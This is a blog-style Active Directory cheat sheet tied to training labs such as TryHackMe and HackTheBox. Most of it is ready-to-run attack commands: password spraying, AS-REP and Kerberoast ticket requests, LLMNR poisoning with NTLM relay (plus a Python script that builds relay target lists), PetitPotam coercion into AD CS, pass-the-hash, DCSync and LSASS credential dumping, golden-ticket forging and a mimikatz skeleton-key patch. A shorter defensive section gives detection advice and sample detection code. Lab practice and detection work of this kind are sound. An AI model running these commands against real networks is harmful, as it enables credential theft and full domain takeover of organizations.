# Active Directory Cheat Sheet for 2025

<figure><img src="https://cdn-images-1.medium.com/max/800/0*YMlH4El_HffbE7qz.png" alt=""><figcaption></figcaption></figure>

> *Active Directory is the spine of enterprise networks — break it, and the whole body collapses.*

Welcome to your **2025-ready Active Directory (AD) cheat sheet**, a master-key reference combining offensive, defensive, and investigative commands. Whether you’re mapping domain forests as a red teamer or auditing misconfigurations as a blue team analyst, this cheat sheet turns your recon into results.

This isn’t just theory — each section below is inspired by real-world labs and CTFs like **TryHackMe’s Attacking AD, Ignite, Wreath**, and **HackTheBox’s Labs** (free tier).

## Scan Network & Initial Enumeration <a href="#b68a" id="b68a"></a>

📌 Think of this like taking a flashlight into a dark room — you’re identifying where the machines live and how they talk.

### **Lab Used**: *TryHackMe — Ignite (Free)*

* `nmap -sn <target_range>` — Ping sweep for live hosts (`-sP` is the old, deprecated spelling of the same scan).
* `nmap -Pn -sV --top-ports 50 --open <target_ip>` — Skip host discovery and fingerprint the most common services (`-Pn`; the `-PN` form is the deprecated spelling).
* `nmap -Pn --script "smb-vuln*" -p139,445 <target_ip>` — Run the SMB vulnerability NSE scripts; quote the glob or your shell may expand it before nmap sees it.
* `cme smb <target_range>` — CrackMapExec (now maintained as NetExec, `nxc`) over SMB: OS build, hostname, domain, and whether SMB signing is required, which decides where NTLM relay will work. Add credentials plus `--shares` or `--users` to enumerate shares and users.

## Active Directory Discovery <a href="#id-9b4d" id="id-9b4d"></a>

**Real-World Feel**: Like sneaking into a library and figuring out the floor plan before grabbing the rare books.

**Lab Used**: *TryHackMe — Attacking AD*

* `nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL` — Locate Domain Controllers through the DC SRV record (`_kerberos._tcp.DOMAIN.LOCAL` lists the KDCs the same way).
* `dig axfr @<dns_server> domain.local` — Request a zone transfer; it only succeeds if the server is misconfigured to allow it, but then you get every record in the zone.
* `enum4linux -a -u "" -p "" <target_ip>` — Null-session enumeration of users, groups, shares and the password policy.
* `smbmap -u "guest" -p "" -P 445 -H <target_ip>` — Test guest access and list what each share lets you read or write.

**Try This in Wreath**: Compare anonymous SMB access vs. guest login.

## Gaining Foothold: Attacks That Work <a href="#a15e" id="a15e"></a>

**This is your beachhead.** You’re not deep yet — but you’ve got a toe in the door.

**Password Spraying**

* `cme smb <target_ip> -u users.txt -p 'Summer2025!' --continue-on-success` → Target first, then one password across every user per round. Pull the policy with `cme smb <target_ip> --pass-pol` before you start, stay at least one attempt under the lockout threshold per user inside the observation window, and wait the window out before the next round. Given two files cme tries every user/password pair, which is a lockout generator, not a spray.

**AS-REP Roasting**

```
# Every listed user gets an AS-REQ without pre-auth; accounts that allow it answer with a crackable AS-REP
GetNPUsers.py DOMAIN.LOCAL/ -usersfile users.txt -format hashcat -dc-ip <dc_ip> -outputfile asrep.txt
```

* **Demo This**: *TryHackMe — Wreath*, where one user lacks pre-auth and leaks an AS-REP you crack offline (hashcat mode 18200). With one valid login, `GetNPUsers.py DOMAIN.LOCAL/USER:PASS -request` lets LDAP find every pre-auth-disabled account instead of guessing names from a wordlist.

**LLMNR Poisoning + Relays**

```
# Responder.conf: set SMB = Off and HTTP = Off so the victim's NTLM auth reaches ntlmrelayx, not Responder
responder -I tun0
# targets.txt = hosts that do not require SMB signing, e.g. from: cme smb <target_range> --gen-relay-list targets.txt
ntlmrelayx.py -tf targets.txt -socks -smb2support
```
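A relay only lands on hosts that do not require SMB signing, so the target list is the part worth getting right. Here is an added example (not from the page or from the cme/impacket projects) that builds `targets.txt` from the SMB banners `cme smb <target_range>` prints; the four banner lines are constructed to match that output format, and the `write_targets` path is an assumption.

```python
"""Build an ntlmrelayx target list from cme/NetExec SMB banners (added example)."""
import re

# Constructed sample output of `cme smb 10.10.10.0/24`: only the DC requires signing.
CME_OUTPUT = """\
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.21     445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.33     445    WS-ACCT01        [*] Windows 10.0 Build 19041 x64 (name:WS-ACCT01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.40     445    LEGACY           [*] Windows 6.1 Build 7601 x64 (name:LEGACY) (domain:WORKGROUP) (signing:False) (SMBv1:True)
"""

BANNER = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+445\s+(?P<host>\S+)\s+\[\*\].*?"
    r"\(domain:(?P<domain>[^)]+)\)\s+\(signing:(?P<signing>True|False)\)"
)


def parse_banners(text):
    """One dict per banner line; `signing` is True when the host REQUIRES signing."""
    hosts = []
    for line in text.splitlines():
        m = BANNER.match(line)
        if m:
            hosts.append({
                "ip": m["ip"],
                "host": m["host"],
                "domain": m["domain"],
                "signing": m["signing"] == "True",
            })
    return hosts


def relay_targets(hosts, domain=None):
    """Hosts that accept an unsigned session, i.e. where a relayed NTLM
    authentication is usable. Signing-required hosts are dropped: the
    relay cannot produce the session key needed to sign. Optionally keep
    only members of one domain so workgroup boxes do not waste relays."""
    targets = []
    for h in hosts:
        if h["signing"]:
            continue
        if domain and h["domain"].lower() != domain.lower():
            continue
        targets.append(f"smb://{h['ip']}")   # ntlmrelayx also accepts bare IPs
    return targets


def write_targets(path, targets):
    """Write the list in the one-target-per-line form `ntlmrelayx.py -tf` reads."""
    with open(path, "w") as f:
        f.write("\n".join(targets) + "\n")
    return len(targets)


if __name__ == "__main__":
    print(relay_targets(parse_banners(CME_OUTPUT), domain="corp.local"))
```

The DC is the host you most want but, because it requires signing by default, it is exactly the one SMB relay cannot reach; that gap is what the LDAP and AD CS relay targets in the next subsection are for.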

**PetitPotam NTLM Coercion**

* `PetitPotam.py -d DOMAIN.LOCAL <listener_ip> <target_ip>` — Forces the target (usually a DC) to authenticate to your listener over MS-EFSRPC; works unauthenticated on unpatched hosts, otherwise add `-u user -p pass`. On its own it only yields a machine-account NTLM exchange you cannot crack; the payoff is relaying it, classically to AD CS web enrollment (`ntlmrelayx.py -t http://<ca_host>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController`), which hands you a certificate for the DC itself.

## Post-Exploitation & Lateral Movement <a href="#cf2a" id="cf2a"></a>

**This is where it gets cinematic.** You’ve got creds. Now you walk the domain.

**Real-Lab Example**: *HackTheBox — Offshore* (a paid Pro Lab, not free tier) runs this exact flow: SMB shares, BloodHound collection, and user-to-user hops.

**BloodHound Collection**

```
# -dc names the DC to query; -ns sends name resolution to the DC so its FQDN resolves over a VPN
bloodhound-python -d DOMAIN.LOCAL -u USER -p PASS -dc DC_FQDN -ns DC_IP -c all --zip
```

**Enumerate Shares**

```
cme smb <target_ip> -u user -p pass --shares
```

**Kerberoasting**

```
# Requests an RC4 (etype 23) TGS for every SPN-bearing user account; crack with hashcat mode 13100
GetUserSPNs.py -request -dc-ip DC_IP -outputfile kerberoast.txt DOMAIN.LOCAL/USER:PASS
```

**Pass-the-Hash (and Pass-the-Key)**

```
# Both take the NT hash only; the LM half before the colon stays empty
evil-winrm -i <ip> -u user -H <nt_hash>              # WinRM on 5985; needs local admin or Remote Management Users
wmiexec.py -hashes :<nt_hash> DOMAIN/user@<target>   # WMI over DCOM; needs local admin on the target
```

Pass-the-Key is the Kerberos variant: `getTGT.py DOMAIN/user -hashes :<nt_hash>` (or `-aesKey`) turns the key into a TGT in a ccache, and the same impacket tools then run with `-k -no-pass` without ever sending NTLM.

## Domain Dominance <a href="#de7b" id="de7b"></a>

*Endgame begins.* You now own one machine. Time to own the forest.

**Credential Dumping**

```
# DCSync over DRSUAPI: needs Domain Admin or the two replication extended rights; nothing touches the DC's disk
secretsdump.py -just-dc-ntlm DOMAIN.LOCAL/USER:PASS@DC_IP
# Offline: parse an LSASS minidump (Task Manager or procdump) on your own box instead of running mimikatz on the victim
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
```

**Golden Ticket**

```
ticketer.py -nthash <krbtgt_nt_hash> -domain-sid <domain_sid> -domain DOMAIN.LOCAL <user>   # writes <user>.ccache
export KRB5CCNAME=<user>.ccache; psexec.py -k -no-pass DOMAIN.LOCAL/<user>@DC_FQDN
```

Use the domain FQDN for `-domain` and the domain SID (`lookupsid.py` or `Get-ADDomain`), and address targets by FQDN, since Kerberos needs a hostname to build the SPN. The forged ticket keeps working until the `krbtgt` password has been changed twice.

**Skeleton Key**

`mimikatz "privilege::debug" "misc::skeleton"` — One key to rule them all. Run on the DC itself: it patches LSASS in memory so every account also accepts the password `mimikatz` alongside its real one. It does not survive a reboot, and it fails where LSASS runs as a protected process (`RunAsPPL`) unless you first load a driver to strip the protection.

## Blue Team & Detection Notes <a href="#id-2f66" id="id-2f66"></a>

**Defend like a hunter.** Here’s what defenders *should* be doing.

* Collect PowerShell Script Block Logging (Event ID 4104) and Module Logging alongside Sysmon, shipped with Winlogbeat into Elastic; Sysmon alone never sees the script content.
* Detect LLMNR/NBT-NS poisoning by asking for names that do not exist and alerting on anyone who answers (`Invoke-DetectResponder.ps1`, or Kevin Robertson's Conveigh), then remove the attack surface: disable LLMNR via the "Turn off multicast name resolution" GPO and NetBIOS over TCP/IP on the adapters.
* Require SMB signing on every host, not just the DCs, and require LDAP signing plus channel binding; a relay goes wherever signing stays optional.
* Enable `Audit Directory Service Changes` (5136/5137/5141 for object creation and attribute edits) and `Audit Directory Service Access` (4662); a 4662 carrying the replication rights `1131f6aa-9c07-11d1-f79f-00c04fc2dcd2` or `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2` from anything other than a DC computer account is DCSync.
* Reset the `krbtgt` password twice after compromise, but wait at least one full replication cycle and the maximum TGT lifetime (10 hours by default) between the two resets; a back-to-back double reset invalidates every outstanding ticket and takes the domain down with it.

*TryHackMe — Security Analyst Path* offers hands-on SIEM and GPO audit labs.
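Three of the attacks above leave distinct traces in the Security log: Kerberoasting as a burst of RC4 service tickets (4769, encryption type 0x17) for several SPNs from one account, AS-REP roasting as a 4768 with pre-authentication type 0, and DCSync as a 4662 carrying a replication GUID from a non-DC principal. The detection logic below is an added example, not from the page or from any SIEM vendor; the events are constructed dicts that carry those fields under simplified key names (`user` for TargetUserName/SubjectUserName, `ticket_enc` for TicketEncryptionType, `preauth_type` for PreAuthType, `properties` for Properties), which you would map from your Winlogbeat documents.

```python
"""Detection logic for Kerberoasting, AS-REP roasting and DCSync (added example)."""
from collections import defaultdict

# Extended rights a DCSync needs; these GUIDs are identical in every forest.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
RC4_HMAC = "0x17"   # TicketEncryptionType for etype 23
NO_PREAUTH = 0      # PreAuthType 0: the KDC answered without pre-authentication


def detect_kerberoast(events, min_spns=3, window_s=300):
    """One account requesting RC4 tickets for several different user-owned
    SPNs inside a short window. Machine accounts (service name ending in $)
    and krbtgt are ignored: their keys are random and nobody roasts them."""
    by_user = defaultdict(list)
    for e in events:
        if e.get("id") != 4769 or e.get("ticket_enc") != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_user[e["user"]].append((e["ts"], svc))
    hits = []
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            spns = {s for t, s in reqs[i:] if t - t0 <= window_s}
            if len(spns) >= min_spns:
                hits.append((user, sorted(spns)))
                break
    return hits


def detect_asrep_roast(events):
    """4768 with PreAuthType 0: the account has 'Do not require Kerberos
    preauthentication' set, so anyone can pull its AS-REP. Each hit is an
    account to fix regardless of who asked."""
    return [(e["user"], e["client_ip"]) for e in events
            if e.get("id") == 4768 and e.get("preauth_type") == NO_PREAUTH]


def detect_dcsync(events, dc_accounts, allow_list=()):
    """4662 whose Properties contain a replication GUID, raised by a principal
    that is neither a DC computer account nor an allow-listed sync account
    (Azure AD Connect's MSOL_* accounts are the usual legitimate source)."""
    ok = {a.upper() for a in list(dc_accounts) + list(allow_list)}
    hits = []
    for e in events:
        if e.get("id") != 4662:
            continue
        props = e["properties"].lower()
        if DS_REPL_GET_CHANGES not in props and DS_REPL_GET_CHANGES_ALL not in props:
            continue
        if e["user"].upper() in ok:
            continue
        hits.append((e["user"], e["object"]))
    return hits


# Constructed sample: benign traffic plus one instance of each attack.
EVENTS = [
    {"id": 4769, "ts": 0, "user": "jdoe", "service": "fs01$", "ticket_enc": "0x12"},
    {"id": 4769, "ts": 100, "user": "svc_scan", "service": "svc_sql", "ticket_enc": "0x17"},
    {"id": 4769, "ts": 105, "user": "svc_scan", "service": "svc_web", "ticket_enc": "0x17"},
    {"id": 4769, "ts": 110, "user": "svc_scan", "service": "svc_backup", "ticket_enc": "0x17"},
    {"id": 4769, "ts": 120, "user": "svc_scan", "service": "svc_sccm", "ticket_enc": "0x17"},
    {"id": 4769, "ts": 130, "user": "svc_scan", "service": "WS01$", "ticket_enc": "0x17"},
    {"id": 4768, "ts": 200, "user": "svc_legacy", "preauth_type": 0, "client_ip": "10.10.14.7"},
    {"id": 4768, "ts": 201, "user": "jdoe", "preauth_type": 2, "client_ip": "10.10.10.33"},
    {"id": 4662, "ts": 300, "user": "CORP\\jdoe", "object": "DC=corp,DC=local",
     "properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "ts": 301, "user": "CORP\\DC02$", "object": "DC=corp,DC=local",
     "properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
DC_ACCOUNTS = ["CORP\\DC01$", "CORP\\DC02$"]


def run_all(events=EVENTS):
    return {
        "kerberoast": detect_kerberoast(events),
        "asrep_roast": detect_asrep_roast(events),
        "dcsync": detect_dcsync(events, DC_ACCOUNTS),
    }


if __name__ == "__main__":
    print(run_all())
```

The Kerberoast rule keys on encryption type rather than volume alone because modern clients request AES tickets; a single 0x17 ticket for an RC4-only legacy service is normal, four different SPNs in five minutes is not. Tune `min_spns` and `window_s` to your environment, and build the DC and sync-account allow-list from AD rather than by hand.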

## Hash Cracking Cheat Codes <a href="#id-80cb" id="id-80cb"></a>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*aLnasR6M2fDo9SSFRIybMw.png" alt=""><figcaption></figcaption></figure>

## Bonus: Custom Tools & Power Scripts <a href="#id-1f7e" id="id-1f7e"></a>

* `PowerView.ps1` – Swiss army knife for AD enumeration (the Recon module of PowerSploit).
* `SharpHound.exe` – Native C# collector for BloodHound; the same data `bloodhound-python` gathers, collected from a domain-joined host.
* `Invoke-Kerberoast`, `Invoke-UserHunter` (finds where privileged users are logged in), `Get-GPPPassword` (decrypts `cpassword` values in Group Policy Preferences with the AES key Microsoft published) – Part of PowerSploit.
* `adidnsdump` – Dumps the AD-integrated DNS zones over LDAP with any domain user, including records a plain zone listing hides; a mapping tool rather than a credential source.

## Final Note <a href="#f19c" id="f19c"></a>

This isn’t a cheat sheet — it’s a tactical guide. Pair these commands with real labs, reflect on each step, and **don’t memorize — internalize**.

> *“The more silently you move in AD, the louder your skills speak.”*

